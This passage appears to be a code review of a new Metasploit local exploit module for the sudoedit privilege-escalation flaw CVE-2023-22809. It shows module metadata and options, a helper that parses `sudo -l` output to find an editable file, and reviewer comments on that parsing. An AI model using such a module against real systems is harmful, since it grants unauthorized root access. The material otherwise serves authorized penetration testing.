modules/exploits/linux/local/sudoedit_bypass_priv_esc.rb

```diff
@@ -0,0 +1,188 @@
+          by appending extra entries on /etc/sudoers allowing for execution of an arbitrary payload with root
+          privileges.
+
+          Affected versions are 1.8.0 through 1.9.12.p1.
+
+          The check method for this module will only work with Debian based systems. However,
+          many *nix based systems should be vulnerable.
+
+          This module was tested against sudo 1.9.9-1ubuntu2 on Ubuntu 22.04
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Matthieu Barjole', # original PoC, analysis
+          'Victor Cutillas' # original PoC, analysis
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'EDB', '51217' ],
+          [ 'URL', 'https://github.com/M4fiaB0y/CVE-2023-22809/blob/main/exploit.sh' ],
+          [ 'URL', 'https://raw.githubusercontent.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc/main/exploit.sh' ],
+          [ 'URL', 'https://www.vicarius.io/vsociety/blog/cve-2023-22809-sudoedit-bypass-analysis' ],
+          [ 'URL', 'https://medium.com/@dev.nest/how-to-bypass-sudo-exploit-cve-2023-22809-vulnerability-296ef10a1466' ],
+          [ 'URL', 'https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf' ],
+          [ 'URL', 'https://www.sudo.ws/security/advisories/sudoedit_any/'],
+          [ 'CVE', '2023-22809' ]
+        ],
+        'DisclosureDate' => '2023-01-18',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+      OptString.new('EDITABLEFILE', [ false, 'A file which can be edited with sudo -e or sudoedit' ]),
+      OptString.new('SHELL', [ true, 'A shell we can launch our payload from. Bash or SH should be safe', '/bin/sh' ])
+    ]
+  end
+
+  # Simplify pulling the writable directory variable
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def get_editable_file
+    vprint_status("Using user defined EDITABLEFILE: #{datastore['EDITABLEFILE']}") if datastore['EDITABLEFILE']
+    return datastore['EDITABLEFILE'] if datastore['EDITABLEFILE']
+
+    # we do a rev here to reverse the order since we only want the last entry, take item 1, then rev it back so its normal. this seemed to
+    # be the easiest way to do a cut -f -1 (negative one). https://stackoverflow.com/questions/22727107/how-to-find-the-last-field-using-cut
+    editable_file = cmd_exec('sudo -l -S | grep -E "sudoedit|sudo -e" | grep -E "(root)" | rev | cut -d " " -f 1 | rev')
```

Comment:
```suggestion
    editable_file = cmd_exec('sudo -l -S')
```
Would we be able to change this and then do the grepping/reversing in ruby?

Reply:
The `| grep -E "(root)"` part is causing this method to fail to identify an editable file on my test system.

The line in `/etc/sudoers` is `%sudo ALL=(ALL:ALL) NOPASSWD: sudoedit /etc/motd`.